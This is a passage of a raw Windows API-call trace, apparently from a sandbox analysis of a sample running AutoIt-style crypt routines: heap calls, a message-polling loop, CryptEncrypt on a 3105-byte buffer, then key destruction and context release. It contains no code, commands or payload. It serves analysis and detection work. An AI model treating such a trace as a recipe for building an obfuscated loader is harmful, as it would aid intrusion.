Size=0x8) returned 0x7da228 [0041.527] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0041.527] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0041.527] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0041.527] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0041.527] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0041.527] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0041.527] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0041.527] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0041.527] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0041.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0041.527] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0041.527] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0041.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0041.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0041.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0041.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0041.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0041.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0041.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0041.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0041.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0041.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0041.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0041.527] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0041.527] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0041.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0041.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0041.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0041.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0041.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0041.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0041.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0041.528] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0041.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0041.528] CryptGetKeyParam (in: hKey=0x7c2200, dwParam=0x7, pbData=0x7da3c8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da3c8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0041.528] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0041.528] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0041.528] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.528] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.528] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.528] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0041.528] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.528] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.528] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0041.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0041.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0041.528] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.529] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0041.529] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0041.529] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0041.529] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.529] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0041.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0041.529] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0041.529] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0041.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0041.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0041.529] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.529] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.529] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.529] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0041.529] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.529] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0041.529] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0041.529] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.530] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0xc15, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0xc20) returned 1 [0041.530] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.530] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0041.530] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.530] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.530] CharLowerBuffW (in: lpsz="byte[3105]", cchLength=0xa | out: lpsz="byte[3105]") returned 0xa [0041.530] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.530] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.530] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0041.530] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0041.530] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.530] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xac3858*, pdwDataLen=0x6ae220*=0xc15, dwBufLen=0xc20 | out: pbData=0xac3858*, pdwDataLen=0x6ae220*=0xc20) returned 1 [0041.530] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.530] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0041.530] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.530] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.530] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.531] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.531] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0041.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0041.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0041.531] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.531] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0041.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0041.531] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0041.531] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0041.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0041.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0041.531] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.531] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0041.531] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0041.531] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0041.531] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0041.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0041.531] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.532] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.532] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0041.532] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.533] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.533] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.533] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0041.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0041.533] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0041.533] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0041.533] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0041.533] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.533] CryptDestroyKey (hKey=0x7c2200) returned 1 [0041.533] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0041.533] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0041.533] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0041.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0041.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.533] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0041.533] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0041.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.541] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0041.541] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0041.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0041.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0041.541] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0041.541] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0041.541] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0041.541] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0041.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0041.541] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0041.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0041.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0041.541] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0041.541] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0041.541] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.541] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0041.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0041.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0041.542] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.542] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0041.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0041.542] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0041.542] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0041.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0041.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0041.542] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.542] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0041.542] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0041.542] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.542] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0041.542] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0041.542] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0041.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0041.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0041.542] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0041.542] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.542] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0041.543] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.543] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.543] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.543] HeapFree (in: hHeap=0x770000, 